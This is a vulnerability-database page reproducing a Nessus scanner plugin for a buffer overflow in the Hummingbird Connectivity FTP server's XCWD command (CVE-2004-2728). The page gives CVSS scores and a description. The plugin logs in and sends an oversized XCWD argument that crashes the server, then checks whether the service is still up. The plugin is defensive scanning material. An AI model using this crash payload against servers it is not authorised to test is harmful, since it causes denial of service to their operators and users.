Lucene search

K
nessusThis script is Copyright (C) 2004-2022 and is owned by Tenable, Inc. or an Affiliate thereof.HUMMINGBIRD_FTP_OVERFLOW.NASL
HistoryDec 31, 2004 - 12:00 a.m.

Hummingbird Connectivity FTP Service XCWD Command Overflow

2004-12-3100:00:00
This script is Copyright (C) 2004-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
23

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:S/C:N/I:N/A:P

EPSS

0.01

Percentile

83.6%

The remote host is running the Hummingbird Connectivity FTP server.

It was possible to shut down the remote FTP server by issuing a XCWD command followed by a too long argument.

This problem allows an attacker to prevent the remote site from sharing some resources with the rest of the world.

#TRUSTED 6045f16518c9186a83fa13aae3cd72bd766f574cb09f9840ac9d26293e4fd1da76ac537f9634fb89a1ecd3cf7a292b6302d1c308ccf8945c0ebe88ee6740f53fb479949f62a89be11b1b12b317e1ef90ff6592379dfc9f0882c4c4c72ccb7e48edae4d204da7157454640d4089bc0fa77f64392f62544f20c01ca76d46dacce787911540682c03fc50ecf25d1f9a699ef333866b12bef0e71f2c0f0d7cf7d9f92fa21380fb0ff50862e2dde4bf2245fca1abdaeece75a2196d03226abe7fe87979373a34a90077b15bce0eb19d9edd4adb1bf464f7bd90fb008702a4527fe0b1d4521ed5635d6f78884ce4fb4541be69bcd771fe8988643653def8f868c60c6d88ea1c683c481f2ecdd4962412a00453d217844e80f167c43fdb09434c0e87b01beea11cf5f34640a1f62cf7bb1ff36bbf85916479cefcc77b065672cd782c9cdfe09960d380c37d27e30ab9e30d42474e97666a8acbab4a4a1c0d0e7b80b7207af6803d42e10b701171e397de9734b42fe1801d4a618300d749efd99e13affad5d7e2d21a55114a62d6e8f3ab23a82692d4753ab2d8b3b5c4fae145466d774e5eb945bfa9e521c71d5ddcf0ffe4d46d107720afb6be047c073ecfaf41e121fa4df248958d5cd5d9fc564ccf45ecced3c65bddf4c5b6b6a59130e5178f2aa7466467636e61b82a62b155d2ced95d8e5b666adf869160ee1be37b24c3ca90ea3a
#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(15613);
  script_version("1.21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/02/11");

  script_cve_id("CVE-2004-2728");
  script_bugtraq_id(11542);

  script_name(english:"Hummingbird Connectivity FTP Service XCWD Command Overflow");

  script_set_attribute(attribute:"synopsis", value:
"The remote FTP server is affected by a buffer overflow vulnerability." );
  script_set_attribute(attribute:"description", value:
"The remote host is running the Hummingbird Connectivity FTP server.

It was possible to shut down the remote FTP server by issuing a XCWD
command followed by a too long argument.

This problem allows an attacker to prevent the remote site
from sharing some resources with the rest of the world." );
  script_set_attribute(attribute:"see_also", value:"http://connectivity.hummingbird.com/" );
  script_set_attribute(attribute:"solution", value:
"There is no known solution at this time." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:U/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2004-2728");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(119);

  script_set_attribute(attribute:"vuln_publication_date", value: "2004/12/31");
  script_set_attribute(attribute:"plugin_publication_date", value: "2004/12/31");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_summary(english:"Attempts a XCWD buffer overflow");
  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 2004-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"FTP");
  script_dependencies("ftp_anonymous.nasl", "ftpserver_detect_type_nd_version.nasl");
  script_require_keys("ftp/login");
  script_require_ports("Services/ftp", 21);

 exit(0);
}

#
# The script code starts here
#

include('ftp_func.inc');

var port = get_ftp_port(default: 21);
var login = get_kb_item("ftp/login");
var password = get_kb_item("ftp/password");

var soc = ftp_open_and_authenticate( user:login, pass:password, port:port );
if(!soc)
{
  exit(0);
}

var s = "XCWD "+ crap(256) +'\r\n';
send(socket:soc, data:s);
recv_line(socket:soc, length:1024);
close(soc);

for (var i = 0; i < 3; i ++)
{
 var soc = open_sock_tcp(port);
 if(soc)
 {
   close(soc);
   exit(0);
 }
 sleep(1);
}

security_report_v4(port:port, severity:SECURITY_NOTE);

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:S/C:N/I:N/A:P

EPSS

0.01

Percentile

83.6%

Related for HUMMINGBIRD_FTP_OVERFLOW.NASL